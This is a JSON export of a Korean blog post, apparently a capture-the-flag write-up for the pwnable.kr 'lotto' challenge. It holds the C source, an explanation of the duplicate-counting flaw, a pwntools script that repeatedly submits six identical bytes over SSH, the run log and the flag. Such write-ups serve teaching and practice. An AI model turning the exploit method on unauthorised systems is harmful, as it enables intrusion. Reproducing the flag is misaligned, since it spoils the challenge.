{"id":3263,"date":"2025-04-10T18:52:07","date_gmt":"2025-04-10T09:52:07","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3263"},"modified":"2025-04-10T18:52:21","modified_gmt":"2025-04-10T09:52:21","slug":"lotto","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3263","title":{"rendered":"lotto"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Mommy! I made a lotto program for my homework.\ndo you want to play?\n\n\nssh lotto@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Source Code<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>lotto.c<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;stdlib.h>\n#include &lt;string.h>\n#include &lt;fcntl.h>\n\nunsigned char submit[6];\n\nvoid play(){\n\t\n\tint i;\n\tprintf(\"Submit your 6 lotto bytes : \");\n\tfflush(stdout);\n\n\tint r;\n\tr = read(0, submit, 6);\n\n\tprintf(\"Lotto Start!\\n\");\n\t\/\/sleep(1);\n\n\t\/\/ generate lotto numbers\n\tint fd = open(\"\/dev\/urandom\", O_RDONLY);\n\tif(fd==-1){\n\t\tprintf(\"error. tell admin\\n\");\n\t\texit(-1);\n\t}\n\tunsigned char lotto[6];\n\tif(read(fd, lotto, 6) != 6){\n\t\tprintf(\"error2. 
tell admin\\n\");\n\t\texit(-1);\n\t}\n\tfor(i=0; i&lt;6; i++){\n\t\tlotto[i] = (lotto[i] % 45) + 1;\t\t\/\/ 1 ~ 45\n\t}\n\tclose(fd);\n\t\n\t\/\/ calculate lotto score\n\tint match = 0, j = 0;\n\tfor(i=0; i&lt;6; i++){\n\t\tfor(j=0; j&lt;6; j++){\n\t\t\tif(lotto[i] == submit[j]){\n\t\t\t\tmatch++;\n\t\t\t}\n\t\t}\n\t}\n\n\t\/\/ win!\n\tif(match == 6){\n\t\tsetregid(getegid(), getegid());\n\t\tsystem(\"\/bin\/cat flag\");\n\t}\n\telse{\n\t\tprintf(\"bad luck...\\n\");\n\t}\n\n}\n\nvoid help(){\n\tprintf(\"- nLotto Rule -\\n\");\n\tprintf(\"nlotto is consisted with 6 random natural numbers less than 46\\n\");\n\tprintf(\"your goal is to match lotto numbers as many as you can\\n\");\n\tprintf(\"if you win lottery for *1st place*, you will get reward\\n\");\n\tprintf(\"for more details, follow the link below\\n\");\n\tprintf(\"http:\/\/www.nlotto.co.kr\/counsel.do?method=playerGuide#buying_guide01\\n\\n\");\n\tprintf(\"mathematical chance to win this game is known to be 1\/8145060.\\n\");\n}\n\nint main(int argc, char* argv[]){\n\n\t\/\/ menu\n\tunsigned int menu;\n\n\twhile(1){\n\n\t\tprintf(\"- Select Menu -\\n\");\n\t\tprintf(\"1. Play Lotto\\n\");\n\t\tprintf(\"2. Help\\n\");\n\t\tprintf(\"3. 
Exit\\n\");\n\n\t\tscanf(\"%d\", &amp;menu);\n\n\t\tswitch(menu){\n\t\t\tcase 1:\n\t\t\t\tplay();\n\t\t\t\tbreak;\n\t\t\tcase 2:\n\t\t\t\thelp();\n\t\t\t\tbreak;\n\t\t\tcase 3:\n\t\t\t\tprintf(\"bye\\n\");\n\t\t\t\treturn 0;\n\t\t\tdefault:\n\t\t\t\tprintf(\"invalid menu\\n\");\n\t\t\t\tbreak;\n\t\t}\n\t}\n\treturn 0;\n}<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Analysis<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/\/ calculate lotto score\n\tint match = 0, j = 0;\n\tfor(i=0; i&lt;6; i++){\n\t\tfor(j=0; j&lt;6; j++){\n\t\t\tif(lotto[i] == submit[j]){\n\t\t\t\tmatch++;\n\t\t\t}\n\t\t}\n\t}<\/pre>\n\n\n\n<p><code>lotto<\/code> \ubc30\uc5f4\uacfc <code>submit<\/code> \ubc30\uc5f4\uc744 \ube44\uad50\ud574\uc11c 6\uc790\ub9ac \uc804\ubd80 \ub2e4 \ub9de\ucd94\ub3c4\ub85d \uc124\uacc4\ud588\uc5b4\uc57c \ud558\ub294\ub370 2\uc911 for\ubb38\uc744 \uc0ac\uc6a9\ud558\uc5ec \ubaa8\ub4e0 \uc870\ud569\uc744 \uac80\uc0ac\ud558\uae30 \ub54c\ubb38\uc5d0, \uc911\ubcf5\ub41c \uc22b\uc790\uac00 \uc788\uc744 \uacbd\uc6b0 \ud558\ub098\uc758 \ubc88\ud638\uac00 \uc5ec\ub7ec \ubc88 \ub9e4\uce6d\ub418\uc5b4 \uc2e4\uc81c\ub85c\ub294 \ud55c \ubc88\ub9cc \uc77c\uce58\ud574\uc57c \ud560 \uacbd\uc6b0\uc5d0\ub3c4 \ub354 \ub9ce\uc740 \uc810\uc218\uac00 \uae30\ub85d\ub41c\ub2e4.<\/p>\n\n\n\n<p>\ub530\ub77c\uc11c \uc544\ub798\uc640 \uac19\uc774 <code>lotto<\/code> \uac12\uc774 \uac00\uc815\ub418\uc5b4 \uc788\uc744 \ub54c \uc81c\ucd9c\ud55c \ubc30\uc5f4\uc5d0 \uac19\uc740 \uc22b\uc790\uac00 \uc911\ubcf5\uc73c\ub85c \uacc4\uc18d \ub4e4\uc5b4\uac00\uba74,<br><code>match<\/code> \uac12\uc744 6\uc73c\ub85c \ub9cc\ub4e4 \uc218 \uc788\ub2e4. \ub2e8, \uadf8 \uc22b\uc790\uac00 <code>lotto<\/code>\uc5d0 \uc815\ud655\ud788 \ud55c \ubc88\ub9cc \uc788\uc5b4\uc57c <code>match<\/code>\uac00 6\uc774 \ub418\ubbc0\ub85c \uc5ec\ub7ec \ubc88 \uc2dc\ub3c4\ud574\uc57c \ud55c\ub2e4.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>lotto<\/strong>\u00a0: [ 1 ] [ 2 ]\u00a0<strong>[ 3 ]<\/strong>\u00a0[ 4 ] [ 5 ] [ 6 
]<\/li>\n\n\n\n<li><strong>submit<\/strong>\u00a0:\u00a0<strong>[ 3 ] [ 3 ] [ 3 ] [ 3 ] [ 3 ] [ 3 ]<\/strong><\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Solution<\/h1>\n\n\n\n<p><code>\\\\x07<\/code>\uc73c\ub85c 6\ubc88 \uc5f0\uc18d\uc73c\ub85c \ud574\uc11c <code>match<\/code> \uac12\uc774 6\uc73c\ub85c \ub418\ub3c4\ub85d \ub9de\ucd94\uc5c8\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n\n# context.log_level = 'debug'\n\ns = ssh('lotto', 'pwnable.kr', 2222, 'guest')\n\nargvs = [\".\/lotto\"]\np = s.process(executable=\".\/lotto\", argv=argvs)\n\n\nwhile True: \n    p.sendlineafter(b\"3. Exit\\n\", b\"1\")\n\n    p.sendlineafter(b\"Submit your 6 lotto bytes : \", b\"\\x07\"*6)\n\n    p.recvline()\n    res = p.recvline()\n    didFail = b\"bad luck...\" in res\n    print(f\"res: {res}, didFail: {didFail}\")\n\n    if didFail:\n        continue\n    break\n\np.close()\ns.close()<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@2d0f4d9a440c:~\/pwnable.kr\/lotto$ python3 solve.py\n[+] Connecting to pwnable.kr on port 2222: Done\n[*] col@pwnable.kr:\n    Distro    Ubuntu 22.04\n    OS:       linux\n    Arch:     amd64\n    Version:  5.15.0\n    ASLR:     Enabled\n    SHSTK:    Disabled\n    IBT:      Disabled\n[+] Starting remote process '.\/lotto' on pwnable.kr: pid 696288\n[!] 
ASLR is disabled for '\/home\/lotto\/lotto'!\nres: b'bad luck...\\n', didFail: True\nres: b'bad luck...\\n', didFail: True\nres: b'bad luck...\\n', didFail: True\nres: b'Sorry_mom_1_Forgot_to_check_duplicates\\n', didFail: False\n[*] Stopped remote process 'lotto' on pwnable.kr (pid 696288)\n[*] Closed connection to 'pwnable.kr'<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description Source Code Analysis lotto \ubc30\uc5f4 \uacfc submit \ubc30\uc5f4\uc744 \ube44\uad50\ud574\uc11c 6\uc790\ub9ac \uc804\ubd80 \ub2e4 \ub9de\ucd94\ub3c4\ub85d \uc124\uacc4\ud588\uc5b4\uc57c\ud558\ub294\ub370 2\uc911 for\ubb38\uc744 \uc0ac\uc6a9\ud5c8\uc5ec \ubaa8\ub4e0 \uc870\ud569\uc744 \uac80\uc0ac\ud558\uae30 \ub54c\ubb38\uc5d0, \uc911\ubcf5\ub41c \uc22b\uc790\uac00 \uc788\uc744 \uacbd\uc6b0 \ud558\ub098\uc758 \ubc88\ud638\uac00 \uc5ec\ub7ec \ubc88 \ub9e4\uce6d\ub418\uc5b4 \uc2e4\uc81c\ub85c\ub294 \ud55c \ubc88\ub9cc \uc77c\uce58\ud574\uc57c \ud560 \uacbd\uc6b0\uc5d0\ub3c4 \ub354 \ub9ce\uc740 \uc810\uc218\uac00 \uae30\ub85d\ub41c\ub2e4. 
\ub530\ub77c\uc11c \uc544\ub798\uc640 \uac19\uc774 lotto \uac12\uc774 \uac00\uc815\ub418\uc788\uc744\ub54c \uc81c\ucd9c\ud55c \ubc30\uc5f4 \uac12\uc774 \uc911\ubcf5\uc73c\ub85c \uacc4\uc18d \uc22b\uc790\uac00 \ub4e4\uc5b4\uac00\uba74,match \uac12\uc744&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3263\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">lotto<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3263","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3263"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3263\/revisions"}],"predecessor-version":[{"id":3264,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3263\/revisions\/3264"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3263"}
,{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}